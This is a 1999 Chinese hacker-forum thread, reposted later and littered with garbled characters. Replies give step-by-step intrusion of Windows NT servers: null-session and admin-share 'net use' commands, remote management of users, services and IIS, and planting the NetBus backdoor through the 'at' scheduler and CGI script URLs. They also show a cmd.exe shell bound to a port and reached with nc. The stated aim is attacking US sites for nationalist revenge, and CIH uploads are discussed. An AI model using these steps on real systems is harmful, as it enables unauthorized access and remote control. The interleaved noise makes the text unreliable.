《版主頁黑客工具和文章的幾個問題》中提到:2 t3 }# Q# Z& S# S; Q
請教,從版主頁上載得PINGER��,GRINDER��,LETMEIN等���,卻不能用�,PINGER安裝后�����,明明安裝前文件有1M多��,但安裝完后生成的文件夾中只有PINGER��。EXE�����,40多K,運(yùn)行PINGER�,設(shè)置好IP,點(diǎn)PING��,彈出一個窗口(C++���。����。���。),說出錯�����,然后關(guān)閉了�����,何故���,是不是安裝有誤�? 2。運(yùn)行LETMEIN���,彈出以下錯誤:連接文件LETMEIN���。EXE到不存在的NETAPI32。DLL�����;NETGROUPGETUSERS��。 是否說明需要NETAPI32�����。DLL文件�����,哪里有該DLL��。 3���。USAKILLER 的教學(xué)文章中提到需在WINNT4���。0下運(yùn)行以下步驟等����,是否要求我的操作系統(tǒng)也是WINNT4�����。0 �,應(yīng)該不是吧? 4��。NC FOR NT 是否要求我的操作系統(tǒng)為NT���,還是服務(wù)器的操作系統(tǒng)為NT? 太多的問題需高手回答����,我花那么多的時間和金錢下載這幾M文件卻不能用,實(shí)在窩囊哦��, 強(qiáng)烈建議USAKILLER 等高手級的黑客寫更多的教學(xué)文章���,以提高我國黑客水平�。4 I' |, d1 R" C" w& Z# R
> 我的機(jī)子MMX166,WIN98�����,2����。5G,32M內(nèi)存��。. G. P/ x" y& G# y f0 S+ P* Q
5 L* A. e7 S2 q% y* E
黑客并不神秘��,你只要了解操作系統(tǒng)�,學(xué)習(xí)一些操作系統(tǒng)的弱點(diǎn),輔助相關(guān)的工具���,就可以成功�。
1 h# u! V# _2 O) p9 S1 K你的問題是�����,pinger, grinder, letmein等工具必須要在NT上運(yùn)行�����,我們強(qiáng)烈建議,你一定要安裝NT����,對于你的機(jī)器配制,和我們現(xiàn)在差不多�����,只是比你多了32M內(nèi)存���,2G硬盤����。
# ` R; Z" a7 H& B' M8 [ _其實(shí)�,攻擊敵站,利用其操作系統(tǒng)本身的工具就可以了�,比如�����,我們在NT上攻擊某服務(wù)器����,該服務(wù)器為NT4.0���,我們將做如下簡單事情就有可能成功,假設(shè)目標(biāo)NT的IP地址為111.111.111.111�����,做法如下:
) x8 k0 ` Q6 A6 B5 m Onet use \\111.111.111.111\ipc$ "" /user:""
5 o1 L9 g. u2 H; Inet.exe是NT的工具文件���,該命令將和目標(biāo)服務(wù)器建立Null Session�,如果成功�����,你可以查看該服務(wù)器上的共享目錄:
& j4 r1 Z* N3 [3 k' knet view \\111.111.111.111; B- @( E" N1 `/ w- M
當(dāng)然�,如果你有該NT管理員密碼,就更好辦了�,假設(shè)其管理員Admin密碼為fuck:
/ x: c2 E3 \' B; E+ H1 Mnet use \\111.111.111.111\ipc$ "fuck" /user:"Admin"
- R5 z1 u1 C. T$ A8 E' F ^& i命令成功后,幾乎所有目標(biāo)NT上的配制��,資源���,你都可以在你本地NT上連接遠(yuǎn)程計(jì)算機(jī)來查看或修改:
% a1 w/ @3 p/ q3 P. m1�����、查看或修改遠(yuǎn)程機(jī)器上的硬盤���,假如目標(biāo)NT上有C�、D兩個硬盤:4 q4 {( n( A$ `- E, D; Z
net use x: \\111.111.111.111\c$
3 l5 a& d0 @/ d' z2 nnet use y: \\111.111.111.111\d$
+ L) @# u$ i) I9 y O這樣���,目標(biāo)NT上的C���、D盤分別被影射為你本地的X、Y盤�,你想怎么做都可以...
6 \" @4 |& L& `. J3 S2、管理目標(biāo)NT的用戶:
' _& G# d8 X0 H6 a+ W1 Y, T從“開始”->“程序”->“管理工具(公用)”->“域用戶管理器”->菜單:“用戶”->“選擇域”
2 v2 {2 A2 J" B4 \, W `鍵入\\111.111.111.111后���,目標(biāo)NT上的所有用戶你想怎么做都可以���,和管理你本地的一樣
# K) U6 V, o$ C, X8 a% `3、管理目標(biāo)NT的服務(wù)0 q& m: f/ q. E- Y
選擇“管理工具(公用)”->“服務(wù)器管理”->“計(jì)算機(jī)”->“選擇域”5 S9 }+ r( @- j5 @! J
這樣你可以管理目標(biāo)NT上的服務(wù)�,共享目錄
* @5 N9 ?% S& X) J+ W+ Z+ O4、IIS管理9 b1 E ?" Y* t; G" Q M
選擇“Microsoft Internet Service管理”->“Internet 服務(wù)管理器”->"連接到服務(wù)器"->111.111.111.111
# M) f) x3 ^+ |$ K* p3 I. u目標(biāo)NT的FTP����、WWW服務(wù)你就可以重新配置* y! d6 Z, o" g; ~) M4 B2 E/ |* D
5�、事件管理: u3 W- V; e! {# }) b7 e1 W
“事件查看器”->連接到服務(wù)器->111.111.111.111
6 R4 ^: d9 V) Z
3 D* b. s- e) e$ v9 \4 `/ O還有更多的東西����,都可以用NT本身的功能來完成��,這些都是95, 98所不能實(shí)現(xiàn)的�����。7 y3 q$ I# L8 D& K: t/ i* J$ \* o
* F, w5 Z5 ^8 _2 `
當(dāng)然����,98,95也能做一些事情,但很麻煩����,比如:# _0 U# l) u' ? _+ R, R4 ?
net use \\111.111.111.111\ipc$
& `# W d1 M) s/ L' \* n' xnet use z: \\111.111.111.111\d$# o" L* H& y4 Z2 l- e
但其后不能帶參數(shù),即改用其他用戶或密碼��,系統(tǒng)將用當(dāng)前用戶和密碼去登錄�,如果你知道目標(biāo)NT的用戶或密碼,重新啟動95, 98���,改用該用戶和密碼登錄�,方可實(shí)現(xiàn),你可以連接目標(biāo)NT上的共享資源����,但不能進(jìn)行管理,如用戶�、事件等
& h% O2 L5 b/ e- S, X. {
1 f& o* S/ y. v/ y5 l! D( W我們強(qiáng)烈建議各位有心要為死難者報(bào)仇,真正的想黑霉國的站點(diǎn)�����,花點(diǎn)時間���,裝個NT吧�����,NT Workstation也可以�!
0 w: i$ a4 ?. B7 F( V這樣��,你還可以了解目標(biāo)機(jī)器上能有什么東東供你去用�����!
( X2 i# U, e; ^9 D9 L- L
0 ^% B* N* P( R# t0 S" U% L9 S' j
--------------------------------------------------------------------------------- _! t. f5 n9 M& {
" Z+ C8 D/ d$ |8 C
>quack于1999-06-12��,23:37:44: N; o/ w+ z8 Y; ]6 j( h& v* s% _
在大作《幾個有關(guān)黑的問題》中提到:
1 X+ V2 C7 G: f+ i1 J首先向各位黑兄們致敬,我下了你們的傳的東東,但發(fā)現(xiàn)在用LETMEIN.EXE的時候沒有用到MYPWD的參數(shù),鍵入LETMEIN查詢其使用方法時亦無此參數(shù)項(xiàng),不知為是何原因?另,用PINGER查詢到的IP地址若無機(jī)器名的是否可以直接進(jìn)入,我怎么用NET USE總無法登陸?再有,假定我上傳了CIH,對了,CIH對NT暫時無效,假定上傳其它"有益"美國NT主機(jī)的東東上去,而未傳NETBUS,可否直接在其機(jī)了運(yùn)行此東東使其當(dāng)堂暴斃?--我曾用LEGION上美國機(jī)子,但運(yùn)行程序時卻是在我的機(jī)上干活,差點(diǎn)把自己斃了!再有,我在微軟的CHAT中常遇到美國鬼子,在其CHAT下怎樣才能看到它的IP?怎樣把它們給KILL了?--順便說一句,我還真干掉了幾個美國人,哈!。
4 K& `5 c+ b1 ?$ g5 L6 z2 v& w; {( _ G; R! b; D( V5 ^) M8 k
killusa于1999-06-13��,03:25:15
( O5 G, X& k& i/ V- W; c4 J: M在大作《Re: 幾個有關(guān)黑的問題》中提到:# v( R5 v: u; ^# |$ Q
6 e0 I9 Y& c# z7 _
letmein.exe 暫時沒有mypwd參數(shù)��,十分抱歉/ ^0 d% i3 y% m" {+ P3 T
pinger程序�,只是利用ping來尋找主機(jī)�,每臺NT服務(wù)器有一個主IP地址,但也可以設(shè)置多個輔助IP地址�����,比如有些服務(wù)器供應(yīng)商����,一臺NT服務(wù)器上可以設(shè)置一千多個IP,每個IP對應(yīng)一個Hostname,而真正能找到主機(jī)名的只有一個IP地址��,就是該主機(jī)的主IP地址�����,所以有時顯示只有IP���,而無主機(jī)名���。另外�,有些服務(wù)器是非NT的操作系統(tǒng)���,有時將不會顯示主機(jī)名���。當(dāng)然,有時在服務(wù)器上進(jìn)行一些設(shè)置����,也會出現(xiàn)上面的情況。+ ]; S' J1 C' b+ f" v
+ n$ ^8 ^. u* F) ~Netbus分客戶端程序ntsrv.exe和服務(wù)器端netbus.exe兩個程序�����,所以�����,netbus.exe是不用上傳的�,只需在目的2 l# N2 L, E' c( o5 R% v7 O, [
服務(wù)器上運(yùn)行ntsrv.exe,而在目的服務(wù)器運(yùn)行該程序有很多種方法:
8 e7 S5 M4 H& j
7 | e3 ~9 X! P4 Z8 K& Z1�、利用服務(wù)器的 Schedule 服務(wù)來啟動schedule 服務(wù)是指在服務(wù)器上定時運(yùn)行某程序,具體使用方法�,可在自己的NT Dos窗口下鍵入以下:
& C2 \) {0 @2 W& v: w
6 M( s8 Z- B" \1 I7 ? V! j' l/ }C:\>net start schedule
% m! f- l6 \, I3 p/ i1 ?- E# H9 mSchedule 正在啟動服務(wù).....
, o: s1 S) |0 `2 BSchedulw 服務(wù)啟動成功����。 T9 t- _' Y& S
C:\>at /?( q% R( Z, Z- P. y3 n* H9 B# @
AT 命令排定在特定的日期和時間運(yùn)行某些命令和程序��。
8 x. y! Y8 @1 V3 W# ]+ {運(yùn)行 AT 命令之前必須先啟動 Schedule 服務(wù)���。
: Q) K4 u' s# u5 e' B: F' |" b& M; D+ A3 z, z5 o2 ?* r
AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
y' ]2 y& ^8 N( i: [( aAT [\\computername] time [/INTERACTIVE]
+ w1 i5 b: p" U0 o8 l1 E[ /EVERY:date[,...] | /NEXT:date[,...]] "command"
) q9 L/ ^; \1 g" a. X/ D
. Y) c) `) F8 R! x\\computername 指定遠(yuǎn)程計(jì)算機(jī)。 如果省略這個參數(shù)0 \ J( _5 h7 o: x. S: \ b
命令會被排定在本機(jī)上運(yùn)行����。
9 W2 F0 |% V7 R- h. Yid 指定給排定進(jìn)度命令的識別號。0 [( E! l+ J; ~4 W T# Q, p* y
" V& W' W0 S8 k# @( @3 ^) l/ C; S/delete 刪除某個已排定進(jìn)度的命令���。如果省略標(biāo)識�,計(jì)算機(jī)上所有已排定進(jìn)度的命令都會被刪除�����。% _. I. K# P! K; I
/yes 用于刪除所有作業(yè)�����,且不想在運(yùn)行刪除時顯示確認(rèn)信息 ���。
/ k' g1 \7 H0 A$ N9 Ptime 指定命令運(yùn)行的時間�。
& Y7 U' \* R z1 [- U/interactive 允許作業(yè)在運(yùn)行時,與用戶通過桌面交互����。; N0 A: S: K5 s- o3 X1 T
_ o! u3 \3 g* G/every:date[,...] 指定在每周或每月的某日 (或某幾日) 運(yùn)行命令。$ g7 L4 z" J5 T! w
如果省略日期���,則默認(rèn)為在每月的本日運(yùn)行��。4 R% x, H. o, a# T, ~
4 Q0 s2 y& t5 p4 R" x6 w- t/next:date[,...] 指定在下一個指定日期 (如��,下周三)��,運(yùn)行命令�。如果省略日期�����,則默認(rèn)為在每月的本日運(yùn)行�����。
) a# C* Z8 [! U3 m1 Y7 ?: K6 }7 g) ~& g5 Q/ B
"command" 準(zhǔn)備運(yùn)行的 Windows NT 命令或批處理文件�。
: J5 G4 Z% f+ L& z+ c8 r
1 ?) h& ^, @7 T2 r6 ]7 k- WC:\>
% b/ p: {( |+ _- M% @- C
: \" m! `0 ^$ F. t) l! x* v知道了如何使用AT����,再來看看如何在遠(yuǎn)程N(yùn)T上運(yùn)行ntsrv.exe:( Z3 P u4 U! S' j
1 利用管理員登陸到目的服務(wù)器���,方法為: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"
$ m& `3 t: f' g2 利用ntsrv.exe啟動遠(yuǎn)程: netsvc \\x.x.x.x schedule /start$ L% Y0 Y# J+ G4 y q& z. D
3 利用AT.EXE在遠(yuǎn)程服務(wù)器設(shè)置程序定時運(yùn)行��,當(dāng)然最快運(yùn)行最理想�,所以�����,你可以用letmein.exe得到服務(wù)器的時間����,然后:! V% @7 |2 v: j, @
at \\x.x.x.x 00:00 ntsrv.exe /port:64321
- f K( v0 H6 u/ _( Z7 x# ?其中00:00要改為用letmein.exe得回來的具體時間+一點(diǎn)容量�,等一會后,再在本地啟動netbus.exe�,鍵入目的服務(wù)器得ip地址或hostname,連接�����!具體使用可參照 "How to get in nt"���,比如第一種方法��,你想要在目的服務(wù)器運(yùn)行 LEGION��,可以利用netbus得上傳功能�����,將LEGION上傳至目的服務(wù)器���,再用netbus的"Start program"��,鍵入完整路徑的LEGION運(yùn)行程序����,就ok了����!第二種方法是利用netbus的“App redirect”功能,啟動遠(yuǎn)程telnet服務(wù)�����,如下:在netbus中擊“App redirect”,鍵入"C:\>winnt\system32\cmd.exe"���,Port為:4321�����,服務(wù)就啟動了�����,然后在本地運(yùn)行:nc x.x.x.x 4321��,出現(xiàn)dos啟動的畫面就表示連接成功: ?5 |) M q) f- B) W& O$ p- r0 k
Microsoft(R) Windows NT(TM)( U& P: b8 D+ m0 V, n
(C) Copyright 1985-1996 Microsoft Corp.) U- ~' q$ Y4 e$ b! K! `$ I- F" {
C:\>7 ?$ ]" E7 R( ~0 Z
8 U+ W) u( {" c2�����、利用web啟動ntsrv.exe或其他程序在目的服務(wù)器! J0 l* B. L( U$ l
) ]4 ~# y' z# s% t
將ntsrv.exe 或其他運(yùn)行程序Copy到目的服務(wù)器的www可執(zhí)行目錄,如cgi-bin或scripts����,然后在瀏覽器鍵入url如:
- Z2 y$ p% M; E1 Z+ b8 K( nhttp://x.x.x.x/scripts/ntsrv.exe /port:64321" Z" x2 G' P) Y4 d+ z
或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:643216 c! a3 P4 N! E9 \8 ?" v" N
該程序就啟動了
8 Q" ~* P5 i& @- [7 L6 H R8 j8 w% T& W }: g6 ~! `# \
我只提這幾中方法!
- `- O! r2 U6 L# O要成功��,必須打好基礎(chǔ)工�����,對操作系統(tǒng)充分了解!/ q$ Z( d9 _' s- k
* i9 V, C- B. c* T6 z
|
發(fā)表于 2011-1-13 17:03:28
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡